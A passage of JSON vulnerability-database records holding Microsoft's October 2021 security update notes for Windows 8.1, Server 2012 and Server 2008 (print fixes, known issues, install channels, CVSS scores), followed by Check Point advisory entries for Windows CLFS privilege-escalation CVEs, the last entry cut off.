{"lastseen": "2022-01-18T17:45:46", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007255](<https://support.microsoft.com/help/5007255>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008285](<https://support.microsoft.com/help/5008285>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006729>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006729](<https://download.microsoft.com/download/a/b/8/ab8ebc15-94ae-4874-851e-e41aec5d2706/5006729.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006729 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "KB5006729", "href": "https://support.microsoft.com/en-us/help/5006729", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T14:17:29", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005613](<https://support.microsoft.com/help/5005613>) (released September 14, 2021) and addresses the following issues:\n\n * Addresses an issue in which a user does not have a way to track DCOM activation failures on a server that is running Windows Server 2012 R2.\n * Addresses an issue in which an Internet print server cannot package the driver to send to the client.\n * Implements a Group Policy setting for the following registry value:\n * Registry location: **HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint** \n \nValue name: **RestrictDriverInstallationToAdministrators** \n \nValue data: **1**\nFor more information, see KB5005652.\n * Adds the ability to configure period or dot (.) delimited IP addresses interchangeably with fully qualified host names in the following Group Policy settings:\n * [Package Point and Print - Approved Servers](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2208>)\n * [Point and Print Restrictions](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2212>)\n * Addresses an issue in which Security Account Manager (SAM) events are not displayed properly in the Event Viewer.\n * In Internet Explorer 11 for Windows 8.1 and Windows Server 2012 R2, certain circumstances might cause Enterprise Mode Site List redirection from Internet Explorer 11 to Microsoft Edge to open the site in multiple tabs in Microsoft Edge.\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007247](<https://support.microsoft.com/help/5007247>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is ressolved in [KB5008263](<https://support.microsoft.com/help/5008263>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006714>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006714](<https://download.microsoft.com/download/f/d/4/fd4df88e-08e2-4a5c-82a3-2b9176ae1e15/5006714.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006714 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "KB5006714", "href": "https://support.microsoft.com/en-us/help/5006714", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T14:17:33", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **\n\n * Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n * Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n * For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005623](<https://support.microsoft.com/help/5005623>) (released September 14, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * Addresses an issue in which an Internet print server cannot package the driver to send to the client.\n * Implements a Group Policy setting for the following registry value:\n * Registry location: **HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint**\n * Value name: **RestrictDriverInstallationToAdministrators**\n * Value data: **1**\nFor more information, see KB5005652.\n * Adds the ability to configure period or dot (.) delimited IP addresses interchangeably with fully qualified host names in the following Group Policy settings:\n * [Package Point and Print - Approved Servers](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2208>)\n * [Point and Print Restrictions](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2212>)\n * Addresses an issue in which Security Account Manager (SAM) events are not displayed properly in the Event Viewer. \n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007260](<https://support.microsoft.com/help/5007260>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008277](<https://support.microsoft.com/help/5008277>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006739>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006739](<https://download.microsoft.com/download/d/9/f/d9f326e7-9d41-436b-9b83-3e43500dbe7a/5006739.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006739 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "KB5006739", "href": "https://support.microsoft.com/en-us/help/5006739", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T14:17:32", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005606](<https://support.microsoft.com/help/5005606>) (released September 14, 2021) and addresses the following issues:\n\n * Addresses an issue in which an Internet print server cannot package the driver to send to the client.\n * Implements a Group Policy setting for the following registry value:\n * Registry location: **HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint**\n * Value name: **RestrictDriverInstallationToAdministrators**\n * Value data: **1**\nFor more information, see KB5005652.\n * Adds the ability to configure period or dot (.) delimited IP addresses interchangeably with fully qualified host names in the following Group Policy settings:\n * [Package Point and Print - Approved Servers](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2208>)\n * [Point and Print Restrictions](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2212>)\n * Addresses an issue in which Security Account Manager (SAM) events are not displayed properly in the Event Viewer.\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007263](<https://support.microsoft.com/help/5007263>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008274](<https://support.microsoft.com/help/5008274>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5006750](<https://support.microsoft.com/help/5006750>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006736>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006736](<https://download.microsoft.com/download/7/5/7/757f46f5-83cd-44fa-b680-b77960abffb6/5006736.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006736 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "KB5006736", "href": "https://support.microsoft.com/en-us/help/5006736", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:49", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-40443)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443"], "modified": "2021-10-12T00:00:00", "id": "CPAI-2021-0737", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:31:50", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-40467)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 